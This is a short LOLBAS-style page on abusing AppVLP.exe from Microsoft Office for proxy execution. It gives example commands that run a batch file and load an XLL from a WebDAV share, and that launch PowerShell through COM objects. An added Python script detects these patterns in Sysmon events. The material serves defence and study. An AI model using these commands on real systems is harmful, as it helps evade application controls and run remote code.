03 : /Privilege-escalation Windows#

~/# cat Appvlp.exe.md

Application Virtualization Utility Included with Microsoft Office 2016

Paths:

C:\Program Files\Microsoft Office\root\client\appvlp.exe
C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

Detection:

Executes calc.bat through AppVLP.exe

AppVLP.exe \\webdav\calc.bat

Executes powershell.exe as a subprocess of AppVLP.exe and runs the given PowerShell command (here, launching calc.exe through the Shell.Application COM object).

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"

Executes powershell.exe as a subprocess of AppVLP.exe and runs the given PowerShell command (here, registering an XLL from a WebDAV share through the Excel.Application COM object).

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
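
Detection example (added here, not part of the original page): a check over process-creation events that flags the three patterns shown above, plus AppVLP.exe running from outside the listed paths. The event field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the `SUSPECT_CHILDREN` list, the `findings` helper and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Install paths this page lists for the genuine binary (compared lowercased).
KNOWN_PATHS = {
    r"c:\program files\microsoft office\root\client\appvlp.exe",
    r"c:\program files (x86)\microsoft office\root\client\appvlp.exe",
}
# Assumption: interpreters not expected under AppVLP.exe; tune per environment.
SUSPECT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                    "wscript.exe", "cscript.exe", "mshta.exe"}
UNC = re.compile(r"\\\\[\w.$-]+\\[\w.$-]+")  # \\host\share

def base(path):
    return ntpath.basename(path).lower()

def findings(event):
    """Return reasons a process-creation event looks like AppVLP.exe proxy execution."""
    reasons = []
    image = event["Image"]
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    if base(parent) == "appvlp.exe":
        if base(image) in SUSPECT_CHILDREN:
            reasons.append("interpreter spawned by AppVLP.exe")
        if UNC.search(cmd):
            reasons.append("child of AppVLP.exe references a UNC path")
    if base(image) == "appvlp.exe":
        if UNC.search(cmd):
            reasons.append("AppVLP.exe launched with a UNC path argument")
        if image.lower() not in KNOWN_PATHS:
            reasons.append("AppVLP.exe running from an unexpected path")
    return reasons

# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
APPVLP = r"C:\Program Files\Microsoft Office\root\client\appvlp.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"Image": APPVLP, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"AppVLP.exe \\webdav\calc.bat"},
    {"Image": PS, "ParentImage": APPVLP,
     "CommandLine": r'''powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"'''},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "WINWORD.EXE"},
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(base(ev["Image"]), "->", findings(ev) or "no findings")
```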